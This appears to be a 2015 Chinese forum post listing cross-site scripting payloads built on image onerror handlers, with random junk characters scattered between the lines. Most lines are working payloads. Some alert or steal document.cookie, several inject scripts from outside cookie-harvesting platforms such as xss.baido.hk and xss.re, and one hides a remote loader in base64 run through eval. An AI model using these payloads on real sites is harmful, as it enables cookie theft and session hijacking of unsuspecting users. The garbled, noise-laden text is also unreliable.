<img src='non-exist.jpg'onerror="alert('xss')">, H' u' `/ x$ s! d6 h
<img src=# onerror=alert(123)>6 i+ q, E7 V3 E5 ~5 X) r
<img src=# onerror=alert(document.cookie)>6 _) A! F# Y9 \8 [
下面是利用平台钓cookie的
( t- _% o+ `( U' K <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
8 a% l9 d( z% }/ N4 R U
/ A: k* S* S* n
& Z* ~# D% k; M- M<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
9 n2 M$ i, ]- f: g" h<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
" y0 B; n: I% \! N“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img> o; s; v$ c% O1 _, M
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
/ A/ b: J. Q' v w3 [% u<img src="#">9 K, I- W' v6 E; b
<img src="#">. V! r' y5 @( ~8 p6 F' S
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>+ |! o: `8 V0 F7 W [
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">+ V4 h/ {' |7 L/ w& t7 l
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>2 P7 t5 ?: Y8 m0 X I& Q- l
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>8 X" o+ J A; E8 f- b
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
. o+ u* L7 D& N! F! l<img src=x width="0" height="0"></img>6 B, ?7 n5 i! ? g* k
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>5 H- ^: y) H5 z Z4 f' Y
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
* E) E! g* }3 L1 \4 ~ |
发表于 2015-10-18 14:33:54
收藏
支持
反对